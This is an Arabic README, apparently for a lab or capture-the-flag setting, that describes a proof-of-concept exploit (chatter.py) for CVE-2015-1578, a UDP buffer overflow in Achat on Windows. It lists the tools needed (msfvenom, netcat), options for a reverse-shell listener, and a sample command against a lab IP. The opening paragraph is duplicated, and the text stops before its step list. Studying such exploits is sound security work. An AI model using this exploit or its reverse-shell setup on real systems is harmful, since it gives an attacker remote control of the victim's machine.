
هذا هو استغلال لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على نظام Windows. يؤدي استغلال الثغرة إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP معدّة خصيصًا.
هذا استغلال لإثبات المفهوم (PoC) لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على نظام ويندوز. يؤدي استغلال هذه الثغرة إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP مُعدّة خصيصًا.
يهدف هذا الـ PoC إلى تقديم مثال نظيف وبسيط ومنظم جيدًا على تطوير الاستغلالات. وهو يوضح:
msfvenommsfvenom (جزء من Metasploit Framework)rlwrap (لتحسين سهولة استخدام Netcat)msfvenomrlwrap nc-i <target_ip> عنوان IP الخاص بالهدف (مطلوب)
-l, --lhost <listener_ip> عنوان IP للمضيف المحلي للـ reverse shell (مطلوب)
-p, --lport <port> المنفذ المحلي للـ reverse shell (مطلوب)
--rport <port> منفذ UDP البعيد على الهدف (الافتراضي: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
سيقوم هذا بـ: